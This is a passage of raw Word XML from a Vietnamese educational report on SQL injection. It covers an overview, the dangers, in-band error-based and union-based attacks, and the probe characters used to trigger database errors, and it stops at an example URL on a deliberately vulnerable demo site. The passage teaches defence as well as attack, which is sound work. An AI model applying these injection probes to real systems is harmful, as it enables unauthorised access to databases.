        <w:p w14:paraId="550A3E78" w14:textId="2B38E982" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895625" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1. Generic Protection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895625 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="050B6088" w14:textId="63BE7F9C" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895626" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.1. Phòng chống Error-Based</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895626 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2082FA34" w14:textId="38B638BC" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895627" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2. Phòng chống Blind SQLi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895627 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BC56A97" w14:textId="738D5179" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895628" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.3. Phòng chống Out of Band</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895628 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F970A8E" w14:textId="2E32DD28" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895629" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.Tài liệu tham khảo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895629 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DF97855" w14:textId="207CD26A" w:rsidR="001D6862" w:rsidRDefault="00150873">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="35AAE105" w14:textId="7B6278DE" w:rsidR="00EF4736" w:rsidRDefault="00EF4736" w:rsidP="00785D75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sectPr w:rsidR="00EF4736" w:rsidSect="004A5116">
          <w:headerReference w:type="default" r:id="rId10"/>
          <w:footerReference w:type="default" r:id="rId11"/>
          <w:footerReference w:type="first" r:id="rId12"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DAFE42B" w14:textId="4FF50665" w:rsidR="00785D75" w:rsidRDefault="00785D75" w:rsidP="005F110A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc42895589"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. SQL injection Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6032F123" w14:textId="05635A6E" w:rsidR="00C23298" w:rsidRPr="00C23298" w:rsidRDefault="00E73003" w:rsidP="00C23298">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Toc42895590"/>
      <w:r w:rsidR="00C23298">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.1. Giới thiệu về SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="00D6040E" w14:textId="1623EF09" w:rsidR="007523D3" w:rsidRDefault="007523D3" w:rsidP="00785D75">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FE62ED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SQL injection là một dạng của tấn công tiêm mã. Tấn công tiêm mã xảy ra khi đầu vào </w:t>
      </w:r>
      <w:r w:rsidR="00386BFA">
        <w:t>được lắp ghép</w:t>
      </w:r>
      <w:r w:rsidR="000F5773">
        <w:t xml:space="preserve"> độc hại được gửi đi bởi kẻ tấn công, khiến ứng dụng thực hiện các hành động ngoài ý muốn. Bởi sự có mặt </w:t>
      </w:r>
      <w:r w:rsidR="00F40025">
        <w:t>ở mọi nơi của cơ sở dữ liệu dạng SQL, SQL injection trở thành một trong các dạng tấn công phổ biến nhất trên Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7C9F81" w14:textId="77777777" w:rsidR="00FF6CCA" w:rsidRDefault="00E73003" w:rsidP="00E73003">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="368BE696" w14:textId="7428865B" w:rsidR="00E73003" w:rsidRDefault="00FF6CCA" w:rsidP="00FE62ED">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_Toc42895591"/>
      <w:r w:rsidR="00E73003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.2. Mức độ nguy hiểm của SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="5CE8507B" w14:textId="1D127C74" w:rsidR="00FE62ED" w:rsidRDefault="00FF6CCA" w:rsidP="00FE62ED">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FE62ED">
        <w:t xml:space="preserve"> SQL injection được biến đến với các đặc trưng sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693D2A02" w14:textId="357237FE" w:rsidR="00FE62ED" w:rsidRDefault="00FE62ED" w:rsidP="00FE62ED">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>+ Xuất hiện thường xuyên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DAD78C" w14:textId="0B15FB9E" w:rsidR="00FE62ED" w:rsidRDefault="00FE62ED" w:rsidP="00FE62ED">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>+ Khai thác dễ dàng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E65DBD9" w14:textId="7583EAB4" w:rsidR="003E5BE4" w:rsidRDefault="00FE62ED" w:rsidP="00FE62ED">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="003E5BE4">
        <w:t>Khả năng tàn phá hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A106D1" w14:textId="42C8112E" w:rsidR="003E5BE4" w:rsidRDefault="003E5BE4" w:rsidP="00FE62ED">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Xét về </w:t>
      </w:r>
      <w:r w:rsidR="00E15BFB">
        <w:t>khả năng khai thác,SQL injection thường được sử dụng để:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1047F7B1" w14:textId="02F8474E" w:rsidR="00E15BFB" w:rsidRDefault="00E15BFB" w:rsidP="00FE62ED">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>+ Trích xuất các thông tin nhạy cảm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D42885" w14:textId="2727464C" w:rsidR="00E15BFB" w:rsidRDefault="00E15BFB" w:rsidP="00FE62ED">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004426DD">
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004426DD">
        <w:t>Có được các chi tiết xác thực của hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5A67B8" w14:textId="05851A60" w:rsidR="004426DD" w:rsidRDefault="004426DD" w:rsidP="00FE62ED">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>+ Có được quyền root Admin để chỉnh sửa hệ thống cơ sở dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E518401" w14:textId="76978A0A" w:rsidR="004426DD" w:rsidRDefault="004426DD" w:rsidP="004426DD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>+ Tiêm thêm các mã độc hại, các mã này sẽ được kích hoạt khi người dùng đến các trang web khác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9794E0" w14:textId="1FBA24C2" w:rsidR="00EB450E" w:rsidRDefault="00EB450E" w:rsidP="004426DD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Theo một số thống kê thì SQL injection nằm trong top đầu các </w:t>
      </w:r>
      <w:r w:rsidR="00CF4499">
        <w:t xml:space="preserve">phương thức tấn công phổ biến nhất. Các hãng như Sony, Yahoo, … cũng đã phải hứng chịu các đợt tấn công SQL injection khi các hacker cố gắng khai thác </w:t>
      </w:r>
      <w:r w:rsidR="006533D1">
        <w:t>chi tiết xác thực của hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A23481D" w14:textId="7692561A" w:rsidR="006533D1" w:rsidRDefault="006533D1" w:rsidP="004426DD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66FE0DEB" w14:textId="2798F81D" w:rsidR="006533D1" w:rsidRDefault="006533D1" w:rsidP="006533D1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc42895592"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.Các dạng tấn công SQL injecti</w:t>
      </w:r>
      <w:r w:rsidR="004F7BA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="3AAEB397" w14:textId="31E3B1E5" w:rsidR="004F7BA0" w:rsidRDefault="006533D1" w:rsidP="009F3C60">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:bookmarkStart w:id="4" w:name="_Toc42895593"/>
      <w:r w:rsidR="004F7BA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1. InBand attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="072C70EB" w14:textId="7C673F1F" w:rsidR="001F182A" w:rsidRPr="001F182A" w:rsidRDefault="001F182A" w:rsidP="001F182A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1.1. Giới thiệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2C83F1" w14:textId="69F0E073" w:rsidR="004F7BA0" w:rsidRDefault="001834E1" w:rsidP="00C77E66">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00C77E66">
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="004F7BA0" w:rsidRPr="004F7BA0">
        <w:t>Tấn công In-band SQL là cách phổ biến nhất và dễ khai thác nhất của cuộc tấn công SQL. Việc tiêm SQL trong băng xảy ra khi kẻ tấn công có thể sử dụng cùng một kênh liên lạc để vừa khởi chạy cuộc tấn công vừa thu nhập kết quả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BBB767" w14:textId="77777777" w:rsidR="00A345EA" w:rsidRPr="004F7BA0" w:rsidRDefault="00A345EA" w:rsidP="00A345EA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55CE9775" w14:textId="4C330FA3" w:rsidR="004F7BA0" w:rsidRPr="004F7BA0" w:rsidRDefault="001834E1" w:rsidP="001834E1">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="004F7BA0" w:rsidRPr="004F7BA0">
        <w:t>Có 2 dạng tấn công phổ biến của loại lỗ hổng in-band SQL là :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71953459" w14:textId="6730333A" w:rsidR="004F7BA0" w:rsidRPr="001834E1" w:rsidRDefault="004F7BA0" w:rsidP="001834E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7BA0">
        <w:t>Error-based SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577A9C67" w14:textId="029D49E5" w:rsidR="004F7BA0" w:rsidRPr="004F7BA0" w:rsidRDefault="004F7BA0" w:rsidP="001834E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7BA0">
        <w:t>Union-based SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09416DF1" w14:textId="55A9CEBB" w:rsidR="00D75926" w:rsidRDefault="00284EC7" w:rsidP="00D75926">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_Toc42895594"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.1.2. Cơ chế tấn côn</w:t>
      </w:r>
      <w:r w:rsidR="00D75926">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="1D1DF652" w14:textId="0483B15E" w:rsidR="00284EC7" w:rsidRPr="00396667" w:rsidRDefault="00D75926" w:rsidP="00396667">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="002375BC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00893FBF">
        <w:tab/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:bookmarkStart w:id="6" w:name="_Toc42895595"/>
      <w:r w:rsidR="00284EC7" w:rsidRPr="00396667">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00396667">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00284EC7" w:rsidRPr="00396667">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error-based SQLi:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="30E52E75" w14:textId="4DED21D8" w:rsidR="00284EC7" w:rsidRDefault="00D75926" w:rsidP="00A47046">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="00C77E66">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r w:rsidR="00684CDE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C77E66">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00684CDE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00284EC7">
        <w:t>Error-based SQLi là một kĩ thuật tấn công in-band SQL, nó dựa trên các thông báo lỗi được ném bởi máy chủ cơ sở dữ liệu dể có được thông tin về cấu trúc của cơ sở dữ liệu. Trong một số trường hợp, chỉ với tấn công error-based SQL là đủ để hacker có thể có đầy đủ cơ sở dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633417BE" w14:textId="77777777" w:rsidR="00284EC7" w:rsidRDefault="00284EC7" w:rsidP="00A47046">
      <w:r>
        <w:t>Mặc dù các lỗi rất có ích trong giai đoạn phát triển các phần của 1 ứng dụng web, nhưng chúng nên bị vô hiệu hóa trên một trang web trực  tuyến hoặc đăng nhập vào 1 file với quyền truy cập hạn chế.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607FBAAC" w14:textId="77777777" w:rsidR="00284EC7" w:rsidRDefault="00284EC7" w:rsidP="00A47046">
      <w:r>
        <w:t>Bằng việc thêm một dấu nháy đơn ( ‘ ),  một dấu nháy kép ( “ ), một  dấu chấm phẩy ( ; ), dấu định nghĩa comment ( -- hoặc /* */,…) và một vài các kí hiệu SQL khác như “AND” và “OR” vào các trường hoặc tham số.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2952D8" w14:textId="77777777" w:rsidR="00284EC7" w:rsidRDefault="00284EC7" w:rsidP="00A47046">
      <w:r>
        <w:t>Ví dụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5BF3B3" w14:textId="4DD6DD19" w:rsidR="00284EC7" w:rsidRDefault="00284EC7" w:rsidP="00C7733A">
      <w:pPr>
        <w:spacing w:line="600" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ta có đường link gốc:</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FCCE08"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   (1)</w:t>
      </w:r>
    </w:p>
